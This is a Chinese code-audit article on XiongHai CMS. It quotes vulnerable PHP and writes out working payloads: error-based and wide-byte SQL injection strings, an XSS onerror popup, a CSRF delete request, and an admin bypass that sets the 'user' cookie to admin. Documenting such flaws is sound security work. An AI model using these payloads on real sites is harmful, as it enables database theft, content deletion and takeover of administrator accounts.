温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

熊海CMS代码审计漏洞怎么解决

发布时间:2023-02-24 11:44:17 来源:亿速云 阅读:172 作者:iii 栏目:开发技术

这篇文章主要介绍了熊海CMS代码审计漏洞怎么解决的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇熊海CMS代码审计漏洞怎么解决文章都会有所收获,下面我们一起来看看吧。

    基本结构

    这里我选择使用小皮面板搭建在了本地,以便于调试错误,首先我们看看系统的结构:

    ——admin     //后台⽂件
    ——css       //css⽂件
    ——files    //功能函数⽂件
    ——images   //图⽚
    ——index.php //主⽬录⽂件
    ——install   //安装⽂件
    ——seacmseditor  //编辑器
    ——template      //模板⽂件
    ——upload    //⽂件上传⽬录

    SQL注入漏洞

    第一处

    我们跳转到admin/files/editlink.php,分析里面的一段代码:

    $id=$_GET['id'];
    $type=$_GET['type'];
    if ($type==1){
    $query = "SELECT * FROM nav WHERE id='$id'";
    $resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
    $nav = mysql_fetch_array($resul);
    }

    简单分析一下,我们通过GET输入id和type,之后type与1进行对比,匹配后会执行SQL语句,了解SQL注入漏洞的朋友可能会看出这里有一个单引号闭合漏洞,我们只需在参数前进行构造闭合单引号,之后便可以成功执行自定义的SQL语句:

    r=editcolumn&type=1&id=1'%20or%20updatexml(1,concat(0x7e,database()),1)%23

    需要注意的是作为结果只返回给我们SQL语句正确与否,所以这里考虑使用错报注入。

    第二处

    admin/files/editlink.php这个路径下有一段代码:

    $id=$_GET['id'];
    $query = "SELECT * FROM link WHERE id='$id'";
    $resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
    $link = mysql_fetch_array($resul);

    这里同样存在一个GET传参点,我们可以传入变量名为id的值,之后会执行SQL语句查询ID,若SQL语句有误,进行错报,因为是单引号闭合这里可以和第一处一样使用错报注入。

    id=1'%20or%20updatexml(1,concat(0x7e,database()),1)%23

    第三处

    /file/download.php这个路径下的代码:

    $llink=addslashes($_GET['r']);
    $query = "SELECT * FROM nav WHERE link='$llink'";

    可以看到里面有addslashes函数:

    熊海CMS代码审计漏洞怎么解决

    这个函数会将预定义字符转换加上反斜杠,所以我们无法进行正常的单引号闭合,需要想办法绕过,方法也很多,这里就简单用宽字节注入绕过

    r=%df%27or%20if(1,sleep(3),1)%20%23

    XSS漏洞

    第一处

    在/file/contact.php出存在漏洞代码:

    $page=addslashes($_GET['page']); 
    <?php echo $page?>

    可以看到直接echo出了page变量,而该变量是我们直接可以GET传入的,这里我们直接使用弹窗payload:

    <img src=1 onerror=alert(/xss/)>

    第二处

    在/files/content.php出,存在与第一处差不多的代码:

    $page=addslashes($_GET['page']);
    if ($page<>""){
    if ($page<>1){
    $pages="第".$page."页 - ";
    }

    我们也可以向上面一样将语句传进变量里去。

    熊海CMS代码审计漏洞怎么解决

    CSRF漏洞

    第一处

    这里以/admin/files/wzlist.php为例:

    $delete=$_GET['delete'];
    if ($delete<>""){
    $query = "DELETE FROM content WHERE id='$delete'";
    $result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
    echo "<script>alert('亲,ID为".$delete."的内容已经成功删除!');location.href='?r=wzlist'</script>";
    exit;

    可以看到代码执行删除SQL语句时并没有对代码进行检测,删除操作对应下面的界面:

    熊海CMS代码审计漏洞怎么解决

    我们先尝试删除然后进行抓包,抓到了删除时GET进行的传参:

    ?r=wzlist&delete=18

    之后换另一个浏览器访问整个payload,结合该系统中的一个越权操作,将user改成admin,之后访问,成功实现了跳过验证进行了删除操作。

    熊海CMS代码审计漏洞怎么解决

    当然这只是其中的一个点,softlist.php也存在类似的CSRF漏洞。

    垂直越权

    第一处

    在/inc/checklogin.php中,这里只看存在漏洞的代码:

    $user=$_COOKIE['user'];
    if ($user==""){
    header("Location: ?r=login");
    exit;

    这里直接给user的cookie值设置成admin,即可跳转管理员界面。

    关于“熊海CMS代码审计漏洞怎么解决”这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对“熊海CMS代码审计漏洞怎么解决”知识都有一定的了解,大家如果还想学习更多知识,欢迎关注亿速云行业资讯频道。

    向AI问一下细节

    免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

    cms
    AI